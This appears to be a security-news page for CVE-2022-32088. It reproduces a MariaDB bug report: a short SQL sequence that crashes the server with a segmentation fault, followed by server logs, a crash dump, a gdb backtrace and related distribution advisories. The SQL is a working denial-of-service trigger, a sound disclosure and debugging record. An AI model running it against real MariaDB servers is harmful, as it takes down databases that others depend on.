Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-32088: [MDEV-26419] A SEGV in Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort.

CVE
#sql#linux#redis#perl

CREATE TABLE v0 ( v1 TINYINT NULL ) ;

TRUNCATE TABLE v0 ;

SELECT instr ( COALESCE ( sqrt ( ( quote ( ‘x’ / 46 ) ) + 0 ) , ‘x’ ) , 51 ) ;

SAVEPOINT v0 ;

SELECT 16 / ‘x’ AS v2 UNION SELECT -2147483648 AS v3 ORDER BY ( LAST_VALUE ( ‘x’ ) OVER ( ) ) LIMIT 6 ;

REPLACE INTO v0 VALUES ( TRUE ) ;

2021-08-16 14:41:38 0 [Note] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 [Note] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 [Note] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 [Note] mysqld: O_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 [Note] InnoDB: Using liburing

2021-08-16 14:41:38 0 [Note] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 [Note] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 [Note] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 [Note] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 [Note] InnoDB: Setting file ‘./ibtmp1’ size to 12 MB. Physically writing the file full; Please wait …

2021-08-16 14:41:38 0 [Note] InnoDB: File ‘./ibtmp1’ size is now 12 MB.

2021-08-16 14:41:38 0 [Note] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 [Note] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib_buffer_pool

2021-08-16 14:41:38 0 [Note] Plugin ‘FEEDBACK’ is disabled.

2021-08-16 14:41:38 0 [Note] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 [Note] Server socket created on IP: '0.0.0.0’.

2021-08-16 14:41:38 0 [Note] Server socket created on IP: '::’.

2021-08-16 14:41:38 0 [Note] /usr/local/mysql/bin//mysqld: ready for connections.

Version: ‘10.7.0-MariaDB’ socket: ‘/tmp/0.socket’ port: 3306 Source distribution

2021-08-16 14:41:39 0 [Note] /usr/local/mysql/bin//mysqld (initiated by: root[root] @ localhost []): Normal shutdown

2021-08-16 14:41:39 0 [Note] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 [Note] InnoDB: Starting shutdown…

2021-08-16 14:41:39 0 [Note] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib_buffer_pool

2021-08-16 14:41:39 0 [Note] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 [Note] InnoDB: Removed temporary tablespace data file: “./ibtmp1”

2021-08-16 14:41:39 0 [Note] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 [Note] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 15:01:54 0 [Note] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 15:01:54 0 [Note] InnoDB: Number of pools: 1

2021-08-16 15:01:54 0 [Note] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 15:01:54 0 [Note] mysqld: O_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 15:01:54 0 [Note] InnoDB: Using liburing

2021-08-16 15:01:54 0 [Note] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 15:01:54 0 [Note] InnoDB: Completed initialization of buffer pool

2021-08-16 15:02:07 0 [Note] InnoDB: 128 rollback segments are active.

2021-08-16 15:02:07 0 [Note] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 15:02:07 0 [Note] InnoDB: Setting file ‘./ibtmp1’ size to 12 MB. Physically writing the file full; Please wait …

2021-08-16 15:02:07 0 [Note] InnoDB: File ‘./ibtmp1’ size is now 12 MB.

2021-08-16 15:02:07 0 [Note] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 15:02:07 0 [Note] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/4/ib_buffer_pool

2021-08-16 15:02:07 0 [Note] Plugin ‘FEEDBACK’ is disabled.

2021-08-16 15:02:07 0 [Note] Server socket created on IP: '0.0.0.0’.

2021-08-16 15:02:07 0 [Note] Server socket created on IP: '::’.

2021-08-16 15:02:08 0 [Note] InnoDB: Buffer pool(s) load completed at 210816 15:02:08

2021-08-16 15:02:09 0 [Note] /usr/local/mysql/bin//mysqld: ready for connections.

Version: ‘10.7.0-MariaDB’ socket: ‘/tmp/4.socket’ port: 10004 Source distribution

210816 15:02:10 [ERROR] mysqld got signal 11 ;

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed,

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key_buffer_size=134217728

read_buffer_size=131072

max_used_connections=1

max_threads=153

thread_count=1

It is possible that mysqld could use up to

key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 467956 K bytes of memory

Hope that’s ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong…

stack_bottom = 0x7f625c527850 thread_stack 0x5fc00

sanitizer_common/sanitizer_common_interceptors.inc:4203(__interceptor_backtrace.part.0)[0x7f627bdd3c3e]

mysys/stacktrace.c:213(my_print_stacktrace)[0x55cd04b35747]

sql/signal_handler.cc:222(handle_fatal_signal)[0x55cd03afd120]

sigaction.c:0(__restore_rt)[0x7f627b7bd870]

sql/sql_analyze_stmt.h:89(Exec_time_tracker::get_loops() const)[0x55cd03af5195]

sql/sql_select.cc:24388(create_sort_index(THD*, JOIN*, st_join_table*, Filesort*))[0x55cd034dc699]

sql/sql_window.cc:3007(Window_funcs_sort::exec(JOIN*, bool))[0x55cd03935d79]

sql/sql_window.cc:3140(Window_funcs_computation::exec(JOIN*, bool))[0x55cd03938435]

sql/sql_select.cc:29457(AGGR_OP::end_send())[0x55cd0350fc76]

sql/sql_select.cc:20766(sub_select_postjoin_aggr(JOIN*, st_join_table*, bool))[0x55cd035105d0]

sql/sql_select.cc:20604(JOIN::exec_inner())[0x55cd0353482c]

sql/sql_select.cc:4514(JOIN::exec())[0x55cd03536593]

sql/sql_select.cc:4993(mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_select_lex*))[0x55cd0352eb5b]

sql/sql_union.cc:2360(st_select_lex_unit::exec())[0x55cd0365117f]

sql/sql_union.cc:43(mysql_union(THD*, LEX*, select_result*, st_select_lex_unit*, unsigned long))[0x55cd0365d7b8]

sql/sql_class.h:4325(THD::is_error() const)[0x55cd035303a0]

sql/sql_parse.cc:6256(execute_sqlcom_select(THD*, TABLE_LIST*))[0x55cd03373d7d]

sql/sql_parse.cc:3946(mysql_execute_command(THD*, bool))[0x55cd0339d421]

sql/sql_parse.cc:8047(mysql_parse(THD*, char*, unsigned int, Parser_state*))[0x55cd033a25a1]

sql/sql_parse.cc:1898(dispatch_command(enum_server_command, THD*, char*, unsigned int, bool))[0x55cd033a860c]

sql/sql_parse.cc:1406(do_command(THD*, bool))[0x55cd033ad73d]

sql/sql_connect.cc:1418(do_handle_one_connection(CONNECT*, bool))[0x55cd03768e57]

sql/sql_connect.cc:1312(handle_one_connection)[0x55cd0376933d]

perfschema/pfs.cc:2204(pfs_spawn_thread)[0x55cd041f9c2c]

pthread_create.c:0(start_thread)[0x7f627b7b3259]

:0(__GI___clone)[0x7f627b35e5e3]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): SELECT 16 / ‘x’ AS v2 UNION SELECT -2147483648 AS v3 ORDER BY ( LAST_VALUE ( ‘x’ ) OVER ( ) ) LIMIT 6

Connection ID (thread ID): 4

Status: NOT_KILLED

Optimizer switch: index_merge=on,index_merge_union=on,index_merge_sort_union=on,index_merge_intersection=on,index_merge_sort_intersection=off,engine_condition_pushdown=off,index_condition_pushdown=on,derived_merge=on,derived_with_keys=on,firstmatch=on,loosescan=on,materialization=on,in_to_exists=on,semijoin=on,partial_match_rowid_merge=on,partial_match_table_scan=on,subquery_cache=on,mrr=off,mrr_cost_based=off,mrr_sort_keys=off,outer_join_with_cache=on,semijoin_with_cache=on,join_cache_incremental=on,join_cache_hashed=on,join_cache_bka=on,optimize_join_buffer_size=on,table_elimination=on,extended_keys=on,exists_to_in=on,orderby_uses_equalities=on,condition_pushdown_for_derived=on,split_materialized=on,condition_pushdown_for_subquery=on,rowid_filter=on,condition_pushdown_from_having=on,not_null_range_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file…

Working directory at /home/fuboat/mariadb-tmp/4

Resource Limits:

Limit Soft Limit Hard Limit Units

Max cpu time unlimited unlimited seconds

Max file size unlimited unlimited bytes

Max data size unlimited unlimited bytes

Max stack size 8388608 unlimited bytes

Max core file size unlimited unlimited bytes

Max resident set unlimited unlimited bytes

Max processes 61608 61608 processes

Max open files 524288 524288 files

Max locked memory 65536 65536 bytes

Max address space unlimited unlimited bytes

Max file locks unlimited unlimited locks

Max pending signals 61608 61608 signals

Max msgqueue size 819200 819200 bytes

Max nice priority 0 0

Max realtime priority 0 0

Max realtime timeout unlimited unlimited us

Copyright © 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type “show copying” and “show warranty” for details.

This GDB was configured as "x86_64-pc-linux-gnu".

Type “show configuration” for configuration details.

For bug reporting instructions, please see:

https://www.gnu.org/software/gdb/bugs/.

Find the GDB manual and other documentation resources online at:

<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type “apropos word” to search for commands related to "word"…

Reading symbols from /usr/local/mysql/bin//mysqld…

[New LWP 639727]

[New LWP 586228]

[New LWP 629512]

[New LWP 630498]

[New LWP 586314]

[New LWP 643180]

[New LWP 629544]

[New LWP 586347]

[New LWP 586033]

[New LWP 630466]

[New LWP 630472]

[New LWP 630499]

[New LWP 630529]

[New LWP 639688]

[New LWP 586318]

[Thread debugging using libthread_db enabled]

Using host libthread_db library "/usr/lib/libthread_db.so.1".

Core was generated by `/usr/local/mysql/bin//mysqld --port 10004 --datadir=/home/fuboat/mariadb-tmp/4’.

Program terminated with signal SIGSEGV, Segmentation fault.

#0 0x00007f627b7ba808 in pthread_kill () from /usr/lib/libpthread.so.0

[Current thread is 1 (Thread 0x7f625c528240 (LWP 639727))]

(gdb) (gdb) #0 0x00007f627b7ba808 in pthread_kill () from /usr/lib/libpthread.so.0

#1 0x000055cd03afd06b in handle_fatal_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal_handler.cc:344

#2 <signal handler called>

#3 0x000055cd03af5195 in Exec_time_tracker::get_loops (this=0x0) at /experiment/mariadb-server/sql/sql_analyze_stmt.h:89

#4 Filesort_tracker::report_use (r_limit_arg=18446744073709551615, thd=0x62b0000bd218, this=0x0) at /experiment/mariadb-server/sql/sql_analyze_stmt.h:235

#5 filesort (thd=<optimized out>, table=table@entry=0x61f00000fcb8, filesort=filesort@entry=0x629000092dd8, tracker=<optimized out>, join=join@entry=0x62900008a768, first_table_bit=<optimized out>) at /experiment/mariadb-server/sql/filesort.cc:267

#6 0x000055cd034dc699 in create_sort_index (thd=thd@entry=0x62b0000bd218, join=join@entry=0x62900008a768, tab=tab@entry=0x629000092068, fsort=0x629000092dd8) at /experiment/mariadb-server/sql/sql_select.cc:24386

#7 0x000055cd03935d79 in Window_funcs_sort::exec (this=0x629000092bf0, join=join@entry=0x62900008a768, keep_filesort_result=keep_filesort_result@entry=false) at /experiment/mariadb-server/sql/sql_window.cc:3007

#8 0x000055cd03938435 in Window_funcs_computation::exec (this=<optimized out>, join=join@entry=0x62900008a768, keep_last_filesort_result=keep_last_filesort_result@entry=false) at /experiment/mariadb-server/sql/sql_window.cc:3140

#9 0x000055cd0350fc76 in AGGR_OP::end_send (this=0x62900008b1f0) at /experiment/mariadb-server/sql/sql_select.cc:29457

#10 0x000055cd035105d0 in sub_select_postjoin_aggr (join=0x62900008a768, join_tab=0x629000092068, end_of_records=<optimized out>) at /experiment/mariadb-server/sql/sql_select.cc:20765

#11 0x000055cd0353482c in do_select (procedure=0x0, join=0x62900008a768) at /experiment/mariadb-server/sql/sql_select.cc:20604

#12 JOIN::exec_inner (this=0x62900008a768) at /experiment/mariadb-server/sql/sql_select.cc:4735

#13 0x000055cd03536593 in JOIN::exec (this=this@entry=0x62900008a768) at /experiment/mariadb-server/sql/sql_select.cc:4513

#14 0x000055cd0352eb5b in mysql_select (thd=0x62b0000bd218, tables=tables@entry=0x62b0000c1408, fields=…, conds=conds@entry=0x0, og_num=1, order=0x629000088f68, group=0x0, having=0x0, proc_param=0x0, select_options=<optimized out>, result=0x6290000890a8, unit=0x62b0000c13c0, select_lex=0x629000088788)

at /experiment/mariadb-server/sql/sql\_select.cc:4991

#15 0x000055cd0365117f in st_select_lex_unit::exec (this=0x62b0000c13c0) at /experiment/mariadb-server/sql/sql_union.cc:2360

#16 0x000055cd0365d7b8 in mysql_union (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x6290000890a8, unit=unit@entry=0x62b0000c13c0, setup_tables_done_option=<optimized out>) at /experiment/mariadb-server/sql/sql_union.cc:42

#17 0x000055cd035303a0 in handle_select (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x6290000890a8, setup_tables_done_option=setup_tables_done_option@entry=0) at /experiment/mariadb-server/sql/sql_select.cc:535

#18 0x000055cd03373d7d in execute_sqlcom_select (thd=0x62b0000bd218, all_tables=<optimized out>) at /experiment/mariadb-server/sql/sql_parse.cc:6256

#19 0x000055cd0339d421 in mysql_execute_command (thd=0x62b0000bd218, is_called_from_prepared_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql_parse.cc:3946

#20 0x000055cd033a25a1 in mysql_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser_state=<optimized out>) at /experiment/mariadb-server/sql/sql_parse.cc:8030

#21 0x000055cd033a860c in dispatch_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql_parse.cc:1896

#22 0x000055cd033ad73d in do_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql_parse.cc:1404

#23 0x000055cd03768e57 in do_handle_one_connection (connect=<optimized out>, put_in_cache=<optimized out>) at /experiment/mariadb-server/sql/sql_connect.cc:1418

#24 0x000055cd0376933d in handle_one_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql_connect.cc:1312

#25 0x000055cd041f9c2c in pfs_spawn_thread (arg=0x617000005b98) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#26 0x00007f627b7b3259 in start_thread () from /usr/lib/libpthread.so.0

#27 0x00007f627b35e5e3 in clone () from /usr/lib/libc.so.6

(gdb) quit

Related news

Gentoo Linux Security Advisory 202405-25

Gentoo Linux Security Advisory 202405-25 - Multiple vulnerabilities have been discovered in MariaDB, the worst fo which can lead to arbitrary execution of code. Versions greater than or equal to 10.11.3:10.11 are affected.

Ubuntu Security Notice USN-5739-1

Ubuntu Security Notice 5739-1 - Several security issues were discovered in MariaDB and this update includes new upstream MariaDB versions to fix these issues. MariaDB has been updated to 10.3.37 in Ubuntu 20.04 LTS and to 10.6.11 in Ubuntu 22.04 LTS and Ubuntu 22.10. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

Red Hat Security Advisory 2022-6443-01

Red Hat Security Advisory 2022-6443-01 - MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. Issues addressed include buffer overflow and use-after-free vulnerabilities.

RHSA-2022:6443: Red Hat Security Advisory: mariadb:10.3 security and bug fix update

An update for the mariadb:10.3 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application crash via certain SELECT ...

Red Hat Security Advisory 2022-6306-01

Red Hat Security Advisory 2022-6306-01 - MariaDB is a multi-user, multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL. Issues addressed include buffer overflow and use-after-free vulnerabilities.

RHSA-2022:6306: Red Hat Security Advisory: rh-mariadb103-galera and rh-mariadb103-mariadb security and bug fix update

An update for rh-mariadb103-galera and rh-mariadb103-mariadb is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application ...

RHSA-2022:5759: Red Hat Security Advisory: rh-mariadb105-galera and rh-mariadb105-mariadb security and bugfix update

An update for rh-mariadb105-galera and rh-mariadb105-mariadb is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application ...

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907